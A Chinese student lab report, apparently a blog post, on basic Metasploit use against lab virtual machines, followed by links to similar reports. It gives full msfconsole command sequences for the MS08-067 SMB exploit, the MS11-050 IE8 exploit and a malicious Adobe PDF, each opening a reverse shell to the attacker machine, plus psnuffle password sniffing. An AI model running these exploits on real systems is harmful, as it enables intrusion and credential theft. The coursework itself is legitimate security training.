成功实现的有:

一个主动攻击实践,ms08_067

一个针对浏览器的攻击,ms11_050

一个针对客户端的攻击,Adobe(在实现这一步骤的时候有点小瑕疵,就是Adobe的版本问题换了三四个才成功)

应用任何一个辅助模块

一、实验内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    • 一个主动攻击实践,如ms08_067;

    • 一个针对浏览器的攻击,如ms11_050;

    • 一个针对客户端的攻击,如Adobe;

  • 成功应用任何一个辅助模块。(成功且唯一)

二、实验步骤

1、一个主动攻击实践

实现ms08_067

靶机为Win2000

  • 在攻击机kali输入msfconsole进入控制台
  • 输入如下指令:
  • msf > use exploit/windows/smb/ms08_067_netapi //选择漏洞

    msf exploit(ms08_067_netapi) > show payloads

    msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //选择载荷

    msf exploit(ms08_067_netapi) > set LHOST 10.0.0.110 //攻击机IP

    msf exploit(ms08_067_netapi) > set LPORT 4324

    msf exploit(ms08_067_netapi) > set RHOST 10.0.0.112 //靶机IP

    msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高

    msf exploit(ms08_067_netapi) > exploit

  • 输入ipconfig等指令可以获得靶机的信息

  • 2、一个针对浏览器的攻击

    ms11_050

  • 在msf控制台中输入search ms11_050,搜索漏洞的相关信息
  • 输入use exploit/windows/browser/ms11_050_mshtml_cobjectelement,使用该漏洞

    • 依次输入如下指令
    • set payload windows/meterpreter/reverse_tcp //选择载荷
      # set LHOST 10.1.1.109 //设置攻击机IP
      # set LPORT 4324
      # set RHOST 10.1.1.243 //设置靶机IP
      # exploit
    • 将生成的网址输入Win7的IE8中,kali自动回连,渗透成功~

    • 3、一个针对客户端的攻击

      (1)Adobe PDF阅读器

    • 输入search adobe,查找漏洞
      • 输入use windows/fileformat/adobe_cooltype_sing,使用漏洞
      • 输入以下指令:
      • set payload windows/meterpreter/reverse_tcp   //选择载荷
        # set LHOST 192.168.137.128 //攻击机IP
        # set FILENAME 20164324.pdf //设置生成pdf文件的文件名
        # exploit
      • use exploit/multi/handler //进入监听模块
        # set payload windows/meterpreter/reverse_tcp
        # set LHOST 192.168.137.128 //攻击机IP
        # set LPORT 4324
        # exploit

      • 将生成的pdf放进靶机中,使用Adobe打开

      • 在kali中看到回连成功

      • 4、成功应用任何一个辅助模块
      • 输入cd /usr/share/metasploit-framework/modules/auxiliary进入到目录中查看有什么辅助模块
      • 我选择了sniffer嗅探器进行实验,进入目录后发现只有psnuffle.rb,这是metasploit中的口令嗅探工具,只有在接入对方网络的初始访问点后才能进行嗅探

      • 在msf控制台中输入use auxiliary/sniffer/psnuffle,使用该漏洞
        • 设置了靶机IP地址后,输入run开始运行,可以看见捕获了上网的记录,渗透成功~
        • 三、实验总结

          1、基础问题回答

          • 用自己的话解释什么是exploit,payload,encode

          exploit就是用于渗透攻击的工具,可以运送payload载体;

          payload是载荷,在实验中就是一段shellcode代码,可以将恶意代码植入正常程序,具体执行攻击代码的模块;

          encode是用于给恶意代码编码,进行伪装,实现面杀的工具。

          2、离实战还缺些什么技术或步骤?

          • meterpreter里面很多漏洞都已经是比较早之前的了,大多数有攻击价值的靶机都已经给有关漏洞打上补丁了,现实中不可能轻易利用这些漏洞攻击,所以需要获取最新漏洞情报。
          • meterpreter虽然提供了很多payload,但是功能都已经固定,要是能自己编写实现特定功能的payload,这样的攻击会更有针对性。
          • 大多数攻击都要关闭防火墙,但是实战中一般不会关掉防火墙,如何绕开防火墙也是重点。
          • 四、心得与体会

            • 我们当前阶段使用的模块都是先人发现了漏洞并只做好了的,单纯的调用一下而已,并且只对于比较旧版本的系统和应用有效,想用于实战的话我们还需要加强对受害者的分析以及攻击方式方面的学习。

2016424王启元 Exp5 msf基础应用的更多相关文章

  1. 2018-2019 20165232 Exp5 MSF基础应用

    2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...

  2. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  3. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  4. 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用

    - 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...

  5. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  6. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

    目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

  7. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  9. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

随机推荐

  1. CodeForces 427A Police Recruits (水题)

    题意:给定 n 个数,有正数和-1, -1表示罪犯,正数表示招了几个警察,一个警察只能看一个罪犯,并且要按顺序,问你有多少罪犯逃脱. 析:很简单么,从开始扫到最后,把是正数就加上,是-1判断剩余警察大 ...

  2. C++11中的to_string

    C++11之前,标准库没有提供数字类型转字符串的函数,需要借助sprintf.stringstream等,现在C++11提供了std::to_string函数,可以直接使用了: 点击(此处)折叠或打开 ...

  3. JavaEE互联网轻量级框架整合开发(书籍)阅读笔记(11):XML和Annotation装配Bean的混合使用(@ImportResource)

    一.XML和Annotation装配Bean如何合理使用 引入第三方资源包中类的时候,建议使用XML配置,而使用自己编写的Java类的时候,推荐使用Annotation注解配置Bean. 二.关于注解 ...

  4. (转)通过扩展让ASP.NET Web API支持JSONP

    原文地址:http://www.cnblogs.com/artech/p/3460544.html 同源策略(Same Origin Policy)的存在导致了“源”自A的脚本只能操作“同源”页面的D ...

  5. 编写高质量代码改善C#程序的157个建议——建议150:使用匿名方法、Lambda表达式代替方法

    建议150:使用匿名方法.Lambda表达式代替方法 方法体如果过小(如小于3行),专门为此定义一个方法就会显得过于繁琐.比如: static void SampeMethod() { List< ...

  6. 12306GT多线程、分流免费抢票工具使用心德

    大事记背景 我相信很多远游他乡的朋友每逢佳节都会遇到一个难题,就是购票难,这个难题有多难呢?经常在12306官网购票的小伙伴应该知道每个地方的放票时间是不一样的,但是逢年过节的那几天即使你在放票几分钟 ...

  7. 基于JSP+Servlet开发手机销售购物商城系统(前台+后台)源码

    基于JSP+Servlet开发手机销售购物商城系统(前台+后台) 开发环境: Windows操作系统 开发工具:Eclipse/MyEclipse+Jdk+Tomcat+MySQL数据库 运行效果图: ...

  8. Update语句到底是如何操作记录的?

    经常会听到一些开发的朋友说,Update语句的操作原理是:先删后加!今天偶然想起这句话,索性验证一下.参考下面示例: USE CSDN go --新添加一个文件组和文件 ALTER DATABASE ...

  9. 清除clusternode

    Import-Module FailoverClusters then clear-clusternode

  10. 不建议使用*{margin:0; padding:0}?

    是不建议用的,应该把具体的标签名都列出来,有时别人在写示例时为了方便会直接这么写; body{ magin:0;padding:0; }这种,就是清除浏览器有可能默认设置边距: 因为“在全局范围使用* ...